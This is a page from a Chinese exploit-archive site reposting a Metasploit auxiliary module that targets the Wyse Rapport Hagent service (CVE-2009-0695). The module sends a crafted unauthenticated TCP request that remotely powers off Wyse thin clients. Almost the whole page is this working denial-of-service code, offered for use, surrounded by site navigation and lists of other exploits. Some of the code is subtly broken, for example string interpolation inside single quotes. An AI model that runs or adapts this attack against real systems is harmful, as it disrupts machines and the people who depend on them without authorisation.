首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Wyse Machine Remote Power off (DOS) without any privilege 来源：it.solunium@gmail.com 作者：solunium 发布时间：2012-06-14   require 'msf/core' class Metasploit3 < Msf::Auxiliary Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos def initialize(info = {}) super(update_info(info, 'Name'           => 'Wyse Machine Remote Power off (DOS)', 'Description'    => %q{ This module exploits the Wyse Rapport Hagent service and cause                                         remote power cycle (Power off the wyse machine remotely). }, 'Stance'         => Msf::Exploit::Stance::Aggressive, 'Author'         => 'it.solunium@gmail.com', 'Version'        => '$Revision: 14976 $', 'References'     => [ ['CVE', '2009-0695'], ['OSVDB', '55839'], ['US-CERT-VU', '654545'], ['URL', 'http://snosoft.blogspot.com/'], ['URL', 'http://www.theregister.co.uk/2009/07/10/wyse_remote_exploit_bugs/'], ['URL', 'http://www.wyse.com/serviceandsupport/support/WSB09-01.zip'], ['URL', 'http://www.wyse.com/serviceandsupport/Wyse%20Security%20Bulletin%20WSB09-01.pdf'], ], 'Privileged'     => true, 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Targets'        => [ [ 'Wyse Linux x86', {'Platform' => 'linux',}], ], 'DefaultTarget'  => 0, 'DisclosureDate' => 'Jun 13 2012' )) register_options( [ Opt::RPORT(80), ], self.class) end def run # Connect to the target service print_status("Connecting to the target #{rhost}:#{rport}") if connect                 print_status("Connected...")                 end # Parameters                 genmac     = "00"+Rex::Text.rand_text(5).unpack("H*")[0] craft_req = '&V52&CI=3|'                 craft_req << 'MAC=#{genmac}|#{rhost}|'                 craft_req << 'RB=0|MT=3|'                 craft_req << '|HS=#{rhost}|PO=#{rport}|'                 craft_req << 'SPO=0|'                 # Send the malicious request sock.put(craft_req) # Download some response data resp = sock.get_once(-1, 10) print_status("Received: #{resp}")                 disconnect if not resp print_error("No reply from the target, this may not be a vulnerable system") return end if resp == '&00'                 print_status("#{rhost} execute command succefuly & power off.")                 return                 end                 #Exeptions rescue ::Rex::ConnectionRefused print_status("Couldn't connect to #{rhost}:#{rport} | Connection refused.")                 rescue ::Rex::HostUnreachable print_status("Couldn't connect to #{rhost}:#{rport} | Host unreachable")                 rescue  ::Rex::ConnectionTimeout print_status("Couldn't connect to #{rhost}:#{rport} | Connection time out") rescue ::Errno::ECONNRESET, ::Timeout::Error print_status("#{rhost} not responding.") end end   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·WordPress plugin Foxypress upl ·Opera 12 Local Arbitrary Downl ·Windows 8 Developer Preview DE ·Edimax IC-3030iWn Authenticati ·XM Easy Personal FTP Server v ·Apple iTunes 10.6.1.7 M3U Play ·Wyse Machine Remote Power off ·F5 BIG-IP SSH Private Key Expo ·ESRI ArcGIS 10.0.X / ArcMap 9 ·Total Video Player V1.31 [.flv ·Adobe Illustrator CS5.5 Memory ·Total Video Player V1.31 Memmo   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved